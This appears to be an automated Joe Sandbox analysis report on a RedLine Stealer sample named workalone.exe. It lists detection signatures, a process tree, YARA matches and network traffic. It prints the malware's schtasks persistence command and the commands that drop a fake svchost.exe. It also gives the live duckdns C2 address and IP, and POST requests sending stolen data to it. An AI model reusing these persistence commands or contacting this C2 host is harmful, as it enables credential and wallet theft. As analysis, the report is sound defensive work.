Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
workalone.exe

Overview

General Information

Sample Name:workalone.exe
Analysis ID:756291
MD5:68f42f485ece93306bef1e4084d3052e
SHA1:c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
SHA256:5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Tries to steal Crypto Currency Wallets
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • workalone.exe (PID: 5836 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)
    • workalone.exe (PID: 5956 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5972 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6040 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6108 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 6080 cmdline: cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              1.0.workalone.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                1.0.workalone.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.0.workalone.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165fe:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165df:$v2_6: GetUpdates
                  1.0.workalone.exe.400000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  0.2.workalone.exe.3a29170.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 15 entries

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\workalone.exe, ParentImage: C:\Users\user\Desktop\workalone.exe, ParentProcessId: 5836, ParentProcessName: workalone.exe, ProcessCommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, ProcessId: 6040, ProcessName: cmd.exe
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: workalone.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeAvira: detection malicious, Label: HEUR/AGEN.1235903
                    Source: workalone.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeJoe Sandbox ML: detected
                    Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}
                    Source: workalone.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: workalone.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Source: global trafficTCP traffic: 85.208.136.178 ports 46539,3,4,5,6,9
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: Malware configuration extractorURLs: saleshor12.duckdns.org:46539
                    Source: unknownDNS query: name: saleshor12.duckdns.org
                    Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: saleshor12.duckdns.org:46539Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: saleshor12.duckdns.org:46539Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: saleshor12.duckdns.org:46539Content-Length: 1144458Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: saleshor12.duckdns.org:46539Content-Length: 1144450Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.3:49685 -> 85.208.136.178:46539
                    Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                    Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                    Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org:
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org:46539
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org:46539/
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: saleshor12.duckdns.org:46539Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: saleshor12.duckdns.org

                    System Summary

                    barindex
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: workalone.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
